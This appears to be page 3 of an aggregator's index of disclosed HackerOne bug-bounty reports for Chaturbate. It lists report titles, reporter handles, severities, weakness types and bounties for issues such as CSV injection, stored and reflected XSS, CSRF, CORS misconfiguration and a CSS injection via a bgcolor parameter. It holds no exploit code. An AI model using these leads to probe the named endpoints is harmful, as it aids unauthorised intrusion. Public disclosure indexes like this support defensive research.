Chaturbate - HackerOne Reports
View on HackerOne52
Total Reports
1
Critical
4
High
14
Medium
28
Low
CSV Injection with the CSV export feature
Reported by:
hackaccinocraft
|
Disclosed:
Low
Weakness: OS Command Injection
Users may still able to view chat room panel of password protected rooms
Reported by:
mikkz
|
Disclosed:
Medium
Weakness: Improper Access Control - Generic
Login form on non-HTTPS page on http://stream.highwebmedia.com/auth/login/
Reported by:
gujjuboy10x00
|
Disclosed:
Low
Weakness: Cleartext Transmission of Sensitive Information
CSS Injection on /embed/ via bgcolor parameter leaks user's CSRF token and allows for XSS
Reported by:
nahamsec
|
Disclosed:
High
Weakness: Cross-site Scripting (XSS) - DOM
Cross-origin resource sharing: arbitrary origin trusted on chatws25.stream.highwebmedia.com
Reported by:
mase289
|
Disclosed:
Weakness: Improper Access Control - Generic
Form Replay in customer information form
Reported by:
imran0x01
|
Disclosed:
Medium
Weakness: Insufficiently Protected Credentials
Forget password link not expiring after email change.
Reported by:
imran_nisar
|
Disclosed:
Medium
Weakness: Improper Authorization
Missing Rate Limitation at /apps/upload_app/
Reported by:
footstep
|
Disclosed:
Low
Weakness: Business Logic Errors
CSRF in cancel group and private show requests
Reported by:
encrypt
|
Disclosed:
Medium
Weakness: Cross-Site Request Forgery (CSRF)
Bounty: $300.00
CSRF in "send them an email and browser notification" feature
Reported by:
encrypt
|
Disclosed:
Low
Weakness: Cross-Site Request Forgery (CSRF)
Bounty: $150.00
Stored XSS on chaturbate.com (wish list)
Reported by:
glc
|
Disclosed:
Low
Weakness: Cross-site Scripting (XSS) - Stored
Bounty: $100.00
Reflected XSS on ssl-ccstatic.highwebmedia.com via player.swf
Reported by:
nahamsec
|
Disclosed:
Medium
Weakness: Cross-site Scripting (XSS) - Reflected
Previous
Page 3 of 3